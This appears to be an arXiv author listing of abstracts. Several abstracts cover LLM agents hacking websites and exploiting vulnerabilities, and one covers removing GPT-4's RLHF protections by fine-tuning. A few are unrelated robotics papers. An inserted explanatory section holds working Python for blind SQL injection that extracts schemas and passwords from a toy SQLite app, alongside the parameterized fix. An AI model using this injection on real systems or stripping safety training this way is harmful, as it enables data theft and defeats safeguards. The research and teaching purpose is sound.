-
Teams of LLM Agents can Exploit Zero-Day Vulnerabilities
Authors:
Richard Fang,
Rohan Bindu,
Akul Gupta,
Qiusi Zhan,
Daniel Kang
Abstract:
LLM agents have become increasingly sophisticated, especially in the realm of cybersecurity. Researchers have shown that LLM agents can exploit real-world vulnerabilities when given a description of the vulnerability and toy capture-the-flag problems. However, these agents still perform poorly on real-world vulnerabilities that are unknown to the agent ahead of time (zero-day vulnerabilities).
In this work, we show that teams of LLM agents can exploit real-world, zero-day vulnerabilities. Prior agents struggle with exploring many different vulnerabilities and long-range planning when used alone. To resolve this, we introduce HPTSA, a system of agents with a planning agent that can launch subagents. The planning agent explores the system and determines which subagents to call, resolving long-term planning issues when trying different vulnerabilities. We construct a benchmark of 15 real-world vulnerabilities and show that our team of agents improve over prior work by up to 4.5$\times$.
Submitted 2 June, 2024;
originally announced June 2024.
-
LLM Agents can Autonomously Exploit One-day Vulnerabilities
Authors:
Richard Fang,
Rohan Bindu,
Akul Gupta,
Daniel Kang
Abstract:
LLMs have become increasingly powerful, both in their benign and malicious uses. With the increase in capabilities, researchers have been increasingly interested in their ability to exploit cybersecurity vulnerabilities. In particular, recent work has conducted preliminary studies on the ability of LLM agents to autonomously hack websites. However, these studies are limited to simple vulnerabilities.
In this work, we show that LLM agents can autonomously exploit one-day vulnerabilities in real-world systems. To show this, we collected a dataset of 15 one-day vulnerabilities that include ones categorized as critical severity in the CVE description. When given the CVE description, GPT-4 is capable of exploiting 87% of these vulnerabilities compared to 0% for every other model we test (GPT-3.5, open-source LLMs) and open-source vulnerability scanners (ZAP and Metasploit). Fortunately, our GPT-4 agent requires the CVE description for high performance: without the description, GPT-4 can exploit only 7% of the vulnerabilities. Our findings raise questions around the widespread deployment of highly capable LLM agents.
Submitted 17 April, 2024; v1 submitted 11 April, 2024;
originally announced April 2024.
-
LLM Agents can Autonomously Hack Websites
Authors:
Richard Fang,
Rohan Bindu,
Akul Gupta,
Qiusi Zhan,
Daniel Kang
Abstract:
In recent years, large language models (LLMs) have become increasingly capable and can now interact with tools (i.e., call functions), read documents, and recursively call themselves. As a result, these LLMs can now function autonomously as agents. With the rise in capabilities of these agents, recent work has speculated on how LLM agents would affect cybersecurity. However, not much is known about the offensive capabilities of LLM agents.
In this work, we show that LLM agents can autonomously hack websites, performing tasks as complex as blind database schema extraction and SQL injections without human feedback. Importantly, the agent does not need to know the vulnerability beforehand. This capability is uniquely enabled by frontier models that are highly capable of tool use and leveraging extended context. Namely, we show that GPT-4 is capable of such hacks, but existing open-source models are not. Finally, we show that GPT-4 is capable of autonomously finding vulnerabilities in websites in the wild. Our findings raise questions about the widespread deployment of LLMs.
Submitted 15 February, 2024; v1 submitted 6 February, 2024;
originally announced February 2024.
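The blind database schema extraction and SQL injection that this abstract refers to, as an added example written for this listing (it is not the paper's LLM-driven agent and not one of its target applications): a constructed in-memory SQLite application with a string-interpolated lookup, a boolean "row found / not found" oracle built on that lookup, and character-by-character recovery of table DDL from sqlite_master through the oracle alone, beside the parameterized version of the same query that the oracle cannot be built on. The table, its rows, and all function names are constructed here; only the Python standard library is used.

```python
import sqlite3

# Constructed toy application (editor's example, not the paper's code):
# one 'users' table and a lookup that interpolates user input into SQL.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES ('alice', 'hunter2'), ('bob', 'swordfish');
    """)
    return conn

def lookup_vulnerable(conn, username):
    # Vulnerable pattern: the input becomes part of the SQL text.
    sql = f"SELECT id FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchone() is not None

def lookup_safe(conn, username):
    # Hardened pattern: the input is bound as data, never parsed as SQL.
    row = conn.execute("SELECT id FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None

def oracle(conn, condition):
    # Boolean-based blind oracle: the only signal an attacker gets is whether
    # the (known-good) username still matches once `condition` is AND-ed in.
    payload = f"alice' AND ({condition}) -- "
    return lookup_vulnerable(conn, payload)

def extract_string(conn, subquery, max_len=128):
    """Recover the scalar string returned by `subquery` one character at a
    time, binary-searching each code point with the boolean oracle."""
    out = ""
    for pos in range(1, max_len + 1):
        # Stop once the string has no character at this position
        # (length(NULL) is NULL, so a missing row also ends the loop).
        if not oracle(conn, f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out

def extract_schema(conn):
    """Blind schema extraction: read table names and their CREATE statements
    out of sqlite_master using nothing but the oracle."""
    count_q = "SELECT count(*) FROM sqlite_master WHERE type='table'"
    n = 0
    while oracle(conn, f"({count_q}) > {n}"):
        n += 1
    schema = {}
    for i in range(n):
        name_q = f"SELECT name FROM sqlite_master WHERE type='table' LIMIT 1 OFFSET {i}"
        ddl_q = f"SELECT sql FROM sqlite_master WHERE type='table' LIMIT 1 OFFSET {i}"
        schema[extract_string(conn, name_q)] = extract_string(conn, ddl_q)
    return schema

if __name__ == "__main__":
    db = make_db()
    print(extract_schema(db))
    print(extract_string(db, "SELECT password FROM users WHERE username='alice'"))
    # The same payload is inert against the parameterized lookup:
    print(lookup_safe(db, "x' OR 1=1 -- "))
```

Each recovered character costs about eight oracle queries (one existence check plus a seven-step binary search over ASCII), which is the kind of repetitive, feedback-driven loop an agent with tool access can run without a human reading responses; the parameterized lookup returns False for every such payload because the quote and the comment marker are treated as part of the username value.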
-
Removing RLHF Protections in GPT-4 via Fine-Tuning
Authors:
Qiusi Zhan,
Richard Fang,
Rohan Bindu,
Akul Gupta,
Tatsunori Hashimoto,
Daniel Kang
Abstract:
As large language models (LLMs) have increased in their capabilities, so has their potential for dual use. To reduce harmful outputs, producers and vendors of LLMs have used reinforcement learning with human feedback (RLHF). In tandem, LLM vendors have been increasingly enabling fine-tuning of their most powerful models. However, concurrent work has shown that fine-tuning can remove RLHF protections. We may expect that the most powerful models currently available (GPT-4) are less susceptible to fine-tuning attacks. In this work, we show the contrary: fine-tuning allows attackers to remove RLHF protections with as few as 340 examples and a 95% success rate. These training examples can be automatically generated with weaker models. We further show that removing RLHF protections does not decrease usefulness on non-censored outputs, providing evidence that our fine-tuning strategy does not decrease usefulness despite using weaker models to generate training data. Our results show the need for further research on protections on LLMs.
Submitted 5 April, 2024; v1 submitted 9 November, 2023;
originally announced November 2023.
-
3-Survivor: A Rough Terrain Negotiable Teleoperated Mobile Rescue Robot with Passive Control Mechanism
Authors:
R. A. Bindu,
A. A. Neloy,
S. Alam,
S. Siddique
Abstract:
This paper presents the design and integration of 3 Survivor, a rough-terrain-negotiable teleoperated mobile rescue and service robot. 3 Survivor is an improved version of two previously studied surveillance robots named Sigma 3 and Alpha N. In 3 Survivor, a modified double-tracked caterpillar mechanism is incorporated in the body design. A passive adjustment established in the body balance enables the front and rear body to operate in excellent synchronization. Instead of using an actuator, a reconfigurable dynamic method is constructed with a 6 DOF arm. This dynamic method is configured with the planar and spatial mechanism, the rotation matrix, motion control of rotation using inverse kinematics, and control of the manipulator's power consumption using angular momentum. The robot is remotely controlled using a handheld Radio Frequency (RF) transmitter. 3 Survivor is equipped with a Raspberry Pi 12 MP camera which is used for livestreaming of robot operations. Object detection algorithms are run on the live video stream. The object detection module (ODM) is built using a Faster RCNN with the VGGNet16 CNN architecture. The entire operation of the robot is monitored through a web control window; the control portal therefore provides a brief scenario of the environment to run, control and steer the robot for more precise operation. An accuracy of 88.25 percent is obtained from this module in a rescue operation. Along with the ODM, the sensor system of the robot provides information on the hazardous terrain. The feasibility of 3 Survivor is tested and presented through different experiments throughout the paper.
Submitted 11 March, 2020;
originally announced March 2020.
-
Sigma-3: Integration and Analysis of a 6 DOF Robotic Arm Configuration in a Rescue Robot
Authors:
R. A. Bindu,
A. A. Neloy,
S. Alam,
N. J Moni,
S. Siddique
Abstract:
This paper introduces a rescue robot named Sigma 3, developed for potential applications such as serving as helping hands for humans where a human cannot reach to assess a hazardous environment. Such robots can also be controlled remotely with an adequate control system. The proposed methodology focuses on two issues: 1. a novel mechanism design for measuring rotation, joints and links of the degrees of freedom (DOF) of an arm integrated with Sigma 3; 2. precise measurement of end-effector motion control over three dimensions. In the proposed mechanism design, the DOF measurement is presented by a planar and spatial mechanism where four types of rigid joints build up each DOF, controlled by six high-torque MG996R servo motors. Rotation and DOF measurement draw on different theoretical references (rotation matrix, inverse kinematics) together with experimental results. The presented methodology exhibits less than 3 percent error in oscillation damping performance when configured for hands-on testing. A further evaluation of operating time strongly supports the mechanism's low power consumption.
Submitted 28 April, 2020; v1 submitted 27 February, 2020;
originally announced February 2020.
-
Alpha-N: Shortest Path Finder Automated Delivery Robot with Obstacle Detection and Avoiding System
Authors:
A. A. Neloy,
R. A. Bindu,
S. Alam,
R. Haque,
M. Saif,
A. Khan,
N. M. Mishu,
S. Siddique
Abstract:
Alpha N, a self-powered, wheel-driven Automated Delivery Robot (ADR), is presented in this paper. The ADR is capable of navigating autonomously by detecting and avoiding objects or obstacles in its path. It uses a vector map of the path and calculates the shortest path by the Grid Count Method (GCM) of Dijkstra's algorithm. Landmark determination uses Radio Frequency Identification (RFID) tags placed in the path for identification and verification of source and destination, and also for recalibration of the current position. In addition, an Object Detection Module (ODM) is built with a Faster RCNN on the VGGNet16 architecture to support path planning by detecting and recognizing obstacles. The Path Planning System (PPS) combines the output of the GCM, the RFID Reading System (RRS) and the binary results of the ODM. This PPS requires a minimum speed of 200 RPM and a duration of 75 seconds for the robot to successfully relocate its position by reading an RFID tag. In the result analysis phase, the ODM exhibits an accuracy of 83.75 percent, the RRS shows 92.3 percent accuracy and the PPS maintains an accuracy of 85.3 percent. Stacking these three modules, the ADR is built, tested and validated, and shows significant improvement in performance and usability compared with other service robots.
Submitted 28 April, 2020; v1 submitted 26 February, 2020;
originally announced February 2020.